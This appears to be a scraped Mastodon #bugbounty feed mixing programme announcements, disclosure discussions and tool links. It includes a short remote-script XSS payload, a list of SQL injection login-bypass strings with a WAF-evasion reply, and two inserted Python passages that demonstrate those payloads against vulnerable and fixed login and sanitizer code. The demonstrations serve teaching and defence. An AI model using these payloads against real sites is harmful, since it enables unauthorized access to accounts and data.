Bug Bounty Hunters Community

paheko, French
@paheko@piaille.fr avatar

We are opening our bug bounty programme for #paheko!

This means that if you look for and find security vulnerabilities in Paheko, we can reward you. The amount of the reward will depend on the severity of the vulnerability. We have set aside €1000 for now, an amount that may change depending on the reports we receive.

A partial security audit will also take place in the coming months.

For details of the bug bounty, see here: https://fossil.kd2.org/paheko/doc/trunk/SECURITY.md

#bugbounty #cybersecurity

bohwaz, French
@bohwaz@mamot.fr avatar

Hello folks and #chatons, has anyone already set up a #bugbounty programme for an open source project?

Most bug bounty sites seem to be designed for big companies.

cyber_learning, French
@cyber_learning@piaille.fr avatar

Do we have, in France and in French, a non-profit ethical platform for disclosing cyber vulnerabilities?
Something like openbugbounty?
If so, which one?

Boosting fixes XSS flaws

#cyber #bugbounty #informatique

cyber_learning,
@cyber_learning@piaille.fr avatar

@shalien 👍 indeed, ANSSI offers the service. The CNIL does not (only declarations of data loss/breach).

Thanks

shalien,
@shalien@projetretro.io avatar

@cyber_learning Sorry, that was from memory, I should have dug deeper.

ChickenPwny,

#bugbounty #tooling =D it takes all the nuclei output and makes it pretty now.

checkout my tool https://github.com/PolitoInc/EGOAlpha

#hacking #redteam @jerry behold the tool i made xD

jerry,

@ChickenPwny very nice!

rwxrwx,

@protonmail you paid $750 for a mail-based XSS? this is disappointing for a "service that respects privacy and puts people [...] first". https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/ #bugbounty #protonmail

protonmail,
@protonmail@mastodon.social avatar

@rwxrwx The issue was fixed in early July 2022. The non-web Proton Mail apps were never affected. At the time the issue was reported, we also conducted a thorough analysis of our available spam and virus filter logs and found no evidence of this attack in the wild except for the proof-of-concept reported to us. This is consistent with the attack's difficulty and the unlikely series of user actions required to make it work.

vito,

I had a field that allows HTML, but the length is limited to 40 server side, so I couldn't do much. So I registered the domain https://XXX.cc and could load a remote script from <script src=//xxx.cc></script>, which fits in 30, and got it working nicely. #bugbounty
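The post above shows why a length cap is not a sanitizer: a protocol-relative script include against a short domain fits in 30 characters. The following is an added example, not vito's code or anything from the service in question. It puts two constructed 30-character payloads (the domain names xxx.cc and 0r.lc from this thread are placeholders) through the length-only check the post describes and then through an allowlist sanitizer built on Python's html.parser, which is the kind of control the field should have had.

```python
import html
from html.parser import HTMLParser

# Constructed payloads in the spirit of the post: a protocol-relative script
# include against a short domain fits in 30 characters, so a length cap alone
# is no defence. xxx.cc / 0r.lc are placeholders, not real attacker hosts.
SHORT_PAYLOADS = [
    "<script src=//xxx.cc></script>",      # 30 characters
    "<svg/onload=import('//0r.lc')>",      # 30 characters, no closing tag needed
]

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_PREFIXES = ("http://", "https://", "/")


def length_only_check(value, limit=40):
    """The only server-side control the post describes: reject over-long input."""
    return len(value) <= limit


class _AllowlistSanitizer(HTMLParser):
    """Rebuilds markup from an allowlist; unknown tags are dropped, text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped <script>/<style> element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            if tag in ("script", "style"):
                self.skip_depth += 1  # also drop the element's text content
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # on* handlers, style, srcdoc ... never get through
            if name == "href" and not value.lstrip().lower().startswith(SAFE_URL_PREFIXES):
                continue  # blocks javascript:, data:, vbscript: URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth:
            return
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize(value):
    """Return a re-serialised, allowlisted version of the submitted HTML fragment."""
    parser = _AllowlistSanitizer()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for payload in SHORT_PAYLOADS:
        print(f"{len(payload):2d} chars | length check passes: {length_only_check(payload)} "
              f"| after sanitize: {sanitize(payload)!r}")
```

Both payloads pass the 40-character gate untouched and come out of the sanitizer empty, while ordinary `<b>`/`<a href="https://...">` markup survives. Re-serialising from an allowlist (rather than stripping patterns from the raw string) is what makes the short-payload game irrelevant: the length of the input never matters, only what is explicitly permitted.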

vito,

@CenturyAvocado wow 5 letters. I tried to find one but they all seem gone now :)

CenturyAvocado,
@CenturyAvocado@fosstodon.org avatar

@vito "0r.lc" and some other permutations appear to still be available ;)

lirantal,

ooh wow, imagemagick is the gift that keeps on giving RCE and command injection 🫣

check out this beauty of a poc
#bugbounty #infosec #cybersecurity

thijs,

So somebody has reported an issue through your responsible disclosure program.

If the report is eligible for a reward, what is the preferred way of transferring the money? Is that e.g. PayPal or a different platform?

#askingforafriend #responsibledisclosure #bugbounty

ChickenPwny,

@kkarhan @thijs you can use almost any option really, some people pay in econ, you can wire the money to your account, PayPal, Venmo

ChickenPwny,

@kkarhan @thijs typically we can trust companies with bank stuff. It's not like they could find you if they wanted if you committed crimes. It's also good for your branding as a hacker.

ChickenPwny,

#bugbounty leaderboard

sergeant,
@sergeant@qoto.org avatar

@ChickenPwny Gay Pride?

insiderphd,

If you've seen the updated OWASP API Top 10 you may be a bit confused by the "Authorisation" vulnerabilities - aren't they all just explaining the same thing? Here's a breakdown of the 4 access control issues you commonly see in APIs 👇👇
https://www.craft.me/s/CysIiph247P5AQ
#bugbountytips #BugBounty

_ut0p1c,

@insiderphd Thanks for sharing! Last time I checked, I think it was earlier this year, OWASP was last updated in 2021. Is this new info?

sanjaymenon,
@sanjaymenon@mastodon.social avatar

Disposable-mailbox Docker

A self hosted yopmail like server running in a docker

https://github.com/Orange-Cyberdefense/disposable-mailbox-docker

#bugbounty #hacking #infosec #security

hdm,

@sanjaymenon got to love that commit message:

"removed stuff"

sanjaymenon,
@sanjaymenon@mastodon.social avatar

@hdm 😂

tdp_org,
@tdp_org@mastodon.social avatar

Someone just reported that a link from our Bug Bounty Hall of Fame page goes to an unregistered profile - i.e. link destination takeover.

Beautiful. Well played. The circle is complete.

#BugBounty #InfoSec

Cyberkid1987, Greek

🪲 nOAuth | OAuth Implementation Flaw Affecting Azure AD OAuth Applications that could lead to full account takeovers

https://m.youtube.com/watch?v=ceeA3FmKxtM

by @descopeinc

#bugbounty #cybersecurity #Azure


nikahverse,

SQL injection auth bypass list

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

#sqli #bugbounty #security #infosec
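The list above mixes payloads that target two different login query shapes, and the last entry only works against the second one, which is why it stands out. The following is an added example, not nikahverse's code: a constructed SQLite database with two users, two vulnerable login functions that interpolate input into the query, a parameterized one, and a helper that runs a few entries from the list against each. Pattern A puts both username and password hash into the WHERE clause, so the comment and `or '1'='1` payloads work. Pattern B only puts the username into the query and compares the hash in application code, so those fail, but the UNION payload supplies its own row whose "stored" hash is md5("1234"), and logging in with password 1234 then succeeds. Unsalted MD5 is used only so the example matches the payload; it is not a recommendation.

```python
import hashlib
import sqlite3

# md5("1234"); the last payload in the list smuggles this in as the "stored" hash.
MD5_OF_1234 = "81dc9bdb52d04dc20036dbd8313ed055"
UNION_PAYLOAD = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '" + MD5_OF_1234

# A handful of entries from the posted list, run below against each login pattern.
SAMPLE_PAYLOADS = ["admin' --", "admin' or '1'='1", "admin') or ('1'='1", UNION_PAYLOAD]


def make_db():
    """Constructed sample database; the admin password is unknown to the attacker."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    con.executemany("INSERT INTO users VALUES (?, ?)", [
        ("admin", hashlib.md5(b"correct horse battery staple").hexdigest()),
        ("alice", hashlib.md5(b"alice-pw").hexdigest()),
    ])
    return con


def md5_hex(password):
    # Unsalted MD5 only so the example matches the payload; real systems use a slow,
    # salted password hash (argon2id, scrypt, bcrypt).
    return hashlib.md5(password.encode()).hexdigest()


def login_both_in_where(con, username, password):
    """Vulnerable pattern A: username and password hash both interpolated into the SQL."""
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password_hash = '{md5_hex(password)}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_hash_checked_in_app(con, username, password):
    """Vulnerable pattern B: only the username is interpolated; the hash is compared in code.
    Commenting out the password clause no longer helps, but UNION lets the attacker
    supply the row (and therefore the hash) the comparison is made against."""
    sql = f"SELECT username, password_hash FROM users WHERE username = '{username}'"
    row = con.execute(sql).fetchone()
    if row and row[1] == md5_hex(password):
        return row[0]
    return None


def login_parameterized(con, username, password):
    """Fixed: a bound parameter is data, never SQL, so no payload changes the query's shape."""
    row = con.execute(
        "SELECT username, password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row and row[1] == md5_hex(password):
        return row[0]
    return None


def run_payloads(login, con, payloads, password):
    """Map each payload to the account it logs in as, or None (SQL errors count as None)."""
    results = {}
    for p in payloads:
        try:
            results[p] = login(con, p, password)
        except sqlite3.Error:
            results[p] = None
    return results


if __name__ == "__main__":
    db = make_db()
    for fn in (login_both_in_where, login_hash_checked_in_app, login_parameterized):
        # "1234" is the password that pairs with the UNION payload; wrong for everything else.
        print(fn.__name__, run_payloads(fn, db, SAMPLE_PAYLOADS, "1234"))
```

Two caveats when carrying this over to a real target: the `admin')` variants fail here because this query has no parentheses to close (they exist for the shape `WHERE (username = '...' AND ...)`), and the UNION payload errors out against pattern A because the column counts of the two SELECTs differ, so a 500 on that payload is itself a hint about the query shape. SQLite treats `||` as string concatenation, so the `'||1-- -` trick from the replies only applies to MySQL-family servers where `||` is logical OR.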

revk,
@revk@toot.me.uk avatar

@nikahverse last on is cunning…

Rairii,
@Rairii@haqueers.com avatar

@nikahverse for mysql and derivatives I always liked '||1-- - which tended to bypass a lot of WAFs

Edent,
@Edent@mastodon.social avatar

Found a tasty little in a new service.
Have performed a - but I doubt they offer a .

SHA1 of the domain: 158281f1ff672afa1159fcb6788aa6825dbb0773

Edent,
@Edent@mastodon.social avatar

For those playing along at home, the answer was....

codeberg.page

https://shkspr.mobi/blog/2023/01/responsible-disclosure-xss-in-codeberg-pages/

#XSS

Edent,
@Edent@mastodon.social avatar

Responsible Disclosure: Chrome security bug let tabs draw over each other ($1k bounty)

Chrome for Android had a flaw which let one tab draw over another - even if the tabs were on completely different domains. A determined attacker might have been able to abuse this to convince a user to download and install a

https://shkspr.mobi/blog/2021/12/responsible-disclosure-chrome-security-bug-lets-tabs-draw-over-each-other/

#/etc/ #bug #bugbounty #google #responsibledisclosure #security

Edent,
@Edent@mastodon.social avatar

Full Disclosure: XSS in Getty Images

I've spent two months trying to report this issue to Getty images. They haven't responded to my emails, phone calls, Tweets, or LinkedIn messages. I've tried escalating through OpenBugBounty and HackerOne - but still no response. I've taken the decision to fully disclose this XSS because the Getty Images sites accept pa

https://shkspr.mobi/blog/2021/08/full-disclosure-xss-in-getty-images/

#/etc/ #bugbounty #responsibledisclosure #security #xss

sanjaymenon,
@sanjaymenon@mastodon.social avatar

A compiled list of companies which accept responsible disclosure

https://bug-bounties.as93.net

#bugbounty #cybersecurity #infosec
